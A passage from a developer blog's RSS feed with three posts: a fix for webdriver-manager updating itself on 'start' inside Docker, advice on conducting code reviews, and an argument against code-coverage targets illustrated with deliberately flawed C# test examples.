manager..?</blockquote><p>And you'd be right. Almost.</p><p>Unfortunately, webdriver-manager start <strong>also performs an update. </strong>Although the only way you'd be able to figure this out is if you read the <a href="https://github.com/angular/webdriver-manager/blob/master/docs/versions.md#start-command-setting-specific-versions">documentation</a> (which honestly seems a little buried to me) or if you ran into the same issue I ran into this week.</p><p><em>While not incredibly relevant to the story, if you want to learn more about what webdriver-manager is, you can read the projects <a href="https://www.npmjs.com/package/webdriver-manager">npm page</a> or the <a href="https://github.com/angular/webdriver-manager">GitHub repository</a>. The TL;DR is that it is a means to manage E2E tests for Angular projects.</em></p><h3 id="it-goes-a-little-something-like-this-">It goes a little something like this...</h3><p>For most of the things we develop at my company, we put them into Docker containers. This includes our end-to-end (E2E) tests. The Dockerfile for our tests is pretty straightforward, and honestly as to not add too many unnecessary details, the only thing that really matters is that we have the following command in the Dockerfile:</p><p><strong>RUN webdriver-manager update</strong></p><p>When the image is built, <em>webdriver-manager update </em>will be run, which will install the latest version of the webdriver manager. Docker images are immutable. That is, when they are created, they do not change. This means that the Docker image will be created with the latest version of the web-driver manager.</p><p>Now, to start the web-driver manager, we need to run the infamous <em>webdriver-manager start </em>command from within the Docker container.</p><p>Though depending on when you created your Docker image and when you started running your container, you're going to get one of two scenarios:</p><ol><li>The container will start up just fine and run your tests as you expect.</li><li>The container will error when trying to run the webdriver-manager.</li></ol><p>This is due to the fact that, unfortunately, <em>webdriver-manager start </em>not only starts, but attempts to start the <strong>latest</strong> version. Regardless of what version is installed. So it is possible that a new version has been released, and the Docker image is no longer relevant.</p><p>Luckily the solution isn't too bad. We just need to update the Dockerfile to update to a specific version. This forces our Docker image to always have version 3.0.0 installed.</p><p><strong>RUN webdriver-manager update --versions.standalone 3.0.0</strong></p><p>We then need to change the webdriver-manager start command to also include the same parameter:</p><p><strong>webdriver-manager start --versions.standalone 3.0.0</strong></p><p>Which in turn, forces the webdriver manager to start a specific version.</p><p>A simple solution, but a problem that took a decent time to figure out what was going wrong. Never would I have imagined that <strong>start </strong>did more than just that. Had the command been called <em>startupdate </em>or just left as <em>start </em>with an optional update parameter, the problem would've been much more apparent.</p><p>The biggest takeaway from all of this is that your naming should say exactly what it is doing and..</p><h3 id="have-no-side-effects">Have no side effects</h3><blockquote>Side effects are lies. Your function promises to do one thing, but it also does other hidden things. Sometimes it will have unexpected behavior. They are devious and damaging mistruths that often result in strange temporal couplings and order dependencies.              – <strong>Miguel Loureiro</strong></blockquote><p>Your code should do what it says it does, and nothing more.</p><p></p><p></p>]]></content:encoded></item><item><title><![CDATA[Conducting a Good Code Review]]></title><description><![CDATA[<figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/codrev.png" class="kg-image"></figure><p>As developers, we perform a lot of code reviews (or at least we should be). They are a great way to not only ensure that the code we intend to deploy to production won't have a negative impact on the system, but also a time to learn and better ourselves.</p>]]></description><link>https://reese.dev/conducting-a-good-code-review/</link><guid isPermaLink="false">5bf70b6104e4b332a4385dc5</guid><category><![CDATA[opinion]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Fri, 14 Sep 2018 20:11:00 GMT</pubDate><content:encoded><![CDATA[<figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/codrev.png" class="kg-image"></figure><p>As developers, we perform a lot of code reviews (or at least we should be). They are a great way to not only ensure that the code we intend to deploy to production won't have a negative impact on the system, but also a time to learn and better ourselves.</p><p>Unfortunately, I have noticed a trend, especially at work. <strong>We</strong> <strong>tend</strong> <strong><strong>spend the majority of our cycles verifying whether or not the code conforms</strong> to <strong>standards</strong></strong>. In other words, our first instinct is to scan the code for incorrectly placed braces, improperly named variables, etc. Rather than review the actual quality of the code.</p><p>There's a lot of great resources available out there on this subject, so I don't want to regurgitate what's already been published, but I did want to highlight a couple points that <a href="http://www.dotnetcurry.com/software-gardening/1351/types-of-code-review-benefits">this</a> article speaks to.</p><p><strong><strong>What a code review is:</strong></strong></p><ul><li>An opportunity to highlight what is being done well. Reaffirm that the developer is taking the correct approach to solving the problem.</li><li>An opportunity to highlight what can be done better. Offer different solutions and approaches and use it as a chance to improve one's skill set.</li></ul><p><strong><strong>What a code review is not:</strong></strong></p><ul><li>A witch hunt, a time to point out every little fault. Code reviews are a great opportunity to learn. Developers should be eager to have their code reviewed, not shy away from it for fear of belittlement (even if unintended).</li></ul><p><strong><strong>How to conduct a code review:</strong></strong></p><p>First and foremost, understand the subject matter. Really familiarize yourself with the problem that the reviewee is trying to solve. Go to the developer's office and immerse yourself in the problem. You can't offer solution suggestions if you don't even know what the problem is.</p><p>Focus on <em><em>how</em></em> the problem was solved. Not how it's formatted. Think big picture. Is the change the right approach to solve the problem in the grand scheme of things?</p><p>Code reviews that just point out every little standard violation aren't beneficial to anyone. Use code reviews as an opportunity to knowledge share, and encourage learning. Not as a platform to demonstrate how well you can enforce formatting guidelines.</p><p>I would also encourage you to seek out reviews from other developers, especially if you're even the slightest bit unsure if your solution makes sense. Just because you have the deploy permission, doesn't mean you're stuck in a silo. Go forth and get a second opinion.</p><p>If you're looking for additional information, here's a blog series that I completely agree with:</p><ul><li><a href="https://mtlynch.io/human-code-reviews-1/">How to Do Code Reviews Like a Human (Part One) </a></li><li><a href="https://mtlynch.io/human-code-reviews-2/">How to Do Code Reviews Like a Human (Part Two)</a></li></ul><p><br></p><p></p>]]></content:encoded></item><item><title><![CDATA[Code Coverage is Useless]]></title><description><![CDATA[<p>Not too long ago there were talks around the office regarding a new testing initiative. Now, by itself, this is fantastic news. Who wouldn't want to actually spend some time and get our testing story up to par?</p><p>The problem lies within the approach that was proposed, going so far</p>]]></description><link>https://reese.dev/code-coverage-is-useless/</link><guid isPermaLink="false">5bdbb3bb7e759204ca2529a4</guid><category><![CDATA[testing]]></category><category><![CDATA[coverage]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Thu, 19 Jul 2018 02:17:00 GMT</pubDate><content:encoded><![CDATA[<p>Not too long ago there were talks around the office regarding a new testing initiative. Now, by itself, this is fantastic news. Who wouldn't want to actually spend some time and get our testing story up to par?</p><p>The problem lies within the approach that was proposed, going so far as to say: <strong><strong>"We need to ensure that we have at least 80% test coverage."</strong></strong></p><p>While the intention is a good one, code coverage is unfortunately useless.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/cotton.jpg" class="kg-image"></figure><p>Now, that <em>is</em> a pretty bold statement, so let me clarify a little bit. Code coverage <strong><strong>goals</strong></strong> are useless. You shouldn't strive for X% coverage on a given codebase. There are a few reasons for this, so let me explain.</p><h3 id="it-is-possible-to-test-enough">It is possible to test <em>enough</em></h3><p>Not all code bases are created equal. One could be for an application that sees millions of hits in a day and is grossly complicated. Another could be for a tiny application that services a couple users a day, if that. I always like to envision these different kinds of applications on a <em>risk plane.</em></p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/risk_plane.png" class="kg-image"><figcaption>.. yeah I still know my way around MS Paint</figcaption></figure><p>Imagine if you will that each dot is an application in our system. The further top-right we go, the more likely that if something were to go wrong it'd be some bad news bears. Whereas the further bottom-left.. eh? Maybe someone would notice.</p><p>Now, it would be a silly little to say that every application should have at least 80% code coverage. Why? <strong><strong>Opportunity cost</strong></strong>. While I am a huge proponent of testing, I don't like to test <em>just because</em>. We should aim to test <em>enough</em>. Test enough so that we have enough <em>confidence </em>that our application will function as we expect it to.</p><p>In reality, maybe for our right-winged applications, 80% isn't enough. Maybe that actually should be higher and we should not stop at 80%. On the flip side, our smaller applications in the bottom left probably don't need such a high coverage percentage. The cycles spent adding tests would potentially bring us little to no value and end up just being a waste of time.</p><blockquote><em><sub><strong><strong>Note:</strong></strong> I feel like at this point some individuals may be a little confused as to how adding tests would be invaluable. There's a whole development methodology called TDD that creates a high level of coverage just by following the red, green, refactor cycle.The points I make here generally refer to going back and adding tests because someone dictated that the code bases coverage percentage was too low. If you're doing TDD to begin with, then setting a target really won't help. It's just a byproduct.</sub></em></blockquote><p>It's all about context. We can't generalize a percentage of coverage in our code base, because each code base is different.</p><p><strong><strong>Fun Fact:</strong></strong> Did you know this sort of risk plane chart can be applicable to many different scenarios? Ever wondered what the risk plane for the security guy looks like?</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/security_risk_plane.png" class="kg-image"></figure><p>Anyway...</p><p>In the same vein, not everything needs a test around it. Let's say we wanted to introduce a new public member into our codebase, something simple</p><pre><code class="language-csharp">public FirstName { get; set; } 
</code></pre>
<p>Introducing this line of code, if not called in any of our tests will <em>drop</em> code coverage. Maybe even below our beloved 80%. The fix?</p><pre><code class="language-csharp">[Fact]
public void FirstName_ByDefault_CanBeSet()  
{
  var myClass = MyClass();
  myClass.FirstName = &quot;testname&quot;;
  Assert.AreEqual(&quot;testname&quot;, myClass.FirstName)
}
</code></pre>
<p>At this point, we're just testing .NET -- something we definitely want to avoid. I tend to only put tests around code that I know could actually have the potential to change in a way that I do not want it to. <em>Logical</em> code.</p><h3 id="code-coverage-is-easy">Code coverage is <em>easy</em></h3><p>Just because we have a lot of code coverage, does not necessarily mean that we can have a lot of confidence that our application works as we expect it to. Everything is always more clear with examples, so let's consider the following:</p><pre><code class="language-csharp">public class Flawless  
{
  public bool IsGuarenteedToWork()
  {
    // some code
  }
}
</code></pre>
<p>Now, methods usually have logic that we would normally want to test, right? Conditionals, mathematical operations, you name it. Though, for our example, it doesn't matter! We just want to increase code coverage. That's our goal.</p><pre><code class="language-csharp">[Fact]
public void IsGuarenteedToWork_ByDefault_Works()  
{
  var flawless = new Flawless();

  var actual = flawless.IsGuarenteedToWork();
}
</code></pre>
<p>And there you have it! 100% code coverage. By default, tests that do not have an <code>Assert</code> will be considered passing. Now you're probably thinking.. oh come on, who would actually do this?</p><p><strong><strong>People do silly things when incentivized</strong></strong>. My go-to example is that of a scenario in which a company tells QA that for every bug they find at the end of the quarter, they will be given a bonus. Seems pretty reasonable right? The flip side of that is the same company tells development that they will receive a bonus based on how few bugs they introduce into the system.</p><p>This scenario incentivizes the failure of opposing groups. The development organization doesn't really want to write any code for fear of introducing a bug <em>and</em> wants QA to miss bugs in their analysis. Whereas the QA group <em>wants</em> development to introduce bugs into the system so that they can find them and be rewarded for doing so.</p><p>The other thing that we need to keep in mind is that...</p><h3 id="code-coverage-context-matters">Code coverage context <em>matters</em></h3><p>Let's consider that our developer wasn't just trying to game the system, and actually put forth an honest effort to obtaining his code coverage goal. Our implementation could be something like the following:</p><pre><code class="language-csharp">public class Flawless  
{
  public bool IsGuarenteedToWork()
  {
    for(var x = 0; x &lt; int.MaxValue; x++) 
    {
      // Man, this is gonna work. I'll find that solution.. eventually.
    }
  }
}
</code></pre>
<p>.. and let's not forget the test.</p><pre><code class="language-csharp">[Fact]
public void IsGuarenteedToWork_ByDefault_Works()  
{
  var flawless = new Flawless();

  var actual = flawless.IsGuarenteedToWork();

  Assert.True(actual);
}
</code></pre>
<p>I hope it was obvious that the example above is far from performant. But in this case, we've reached 100% code coverage and we're actually asserting that the code is working as we intend it to. The implementation works. The test is correct. Everyone is happy. Almost...</p><p>When it comes to testing, there are different <em>stakeholders</em>.</p><blockquote><em>Stakeholders are people whose lives you touch - Mark McNeil</em></blockquote><p>This can be broken down further into the types of stakeholders.</p><ol><li>Primary Stakeholder (who I'm doing it for) <sub>Example: The customer who requested the feature.</sub></li><li>Secondary Stakeholder (others who are directly involved) <sub>Example: Your boss and/or other developers on the project.</sub></li><li>Indirect Stakeholder (those who are impacted otherwise) <sub>Example: The customers of your customer.</sub></li></ol><p>As programmers, we are writing code to solve problems for other people (sometimes ourselves if we can find the time). The same section of code matters differently to different people. Person A <em>only</em> cares that the answer is correct. Maybe they're notified when it's ready, but they're pretty indifferent to when they receive it. Person B <em>needs</em> the answer soon after requesting it. Our test only completely satisfies Person A.</p><p>There can be a lot of stakeholders when it comes to writing code. Unfortunately, we can't say with confidence, even at 100% code coverage, that our code is going to be compatible with everyone's needs.</p><p>After all of the harping on why code coverage is useless as a <strong><strong>target</strong></strong>. I need to wrap up by saying...</p><h3 id="code-coverage-can-actually-be-useful">Code coverage can actually be <em>useful</em></h3><p>I prefer to leverage code coverage as a <strong><strong>metric</strong></strong>. Coverage is something that we're aware of, something that we can use to make informed decisions about each codebase.</p><p>If we notice that one codebase is consistently dropping in coverage, we can take that as a sign to look a little deeper into what's going on. Is the codebase incredibly hard to test? Are the developers just not putting forth the effort to test, even when it makes sense? Maybe it's actually what we would expect from that code base, so everything is gravy.</p><p>Coverage can also just let us know if we're doing an adequate amount of testing. If a mission-critical application only has 10% coverage, we should investigate the reasons for that and potentially start a quality initiative and gets some tests strapped on. It allows us to prioritize our testing initiatives without just randomly picking a codebase and start throwing tests at it.</p><p>The entire point of all of this is that setting coverage targets will just be counterproductive to your goals. We should be aware of coverage so that we can make informed decisions, but not let it impact the quality of our code just for the sake of coverage attainment.</p>]]></content:encoded></item></channel></rss>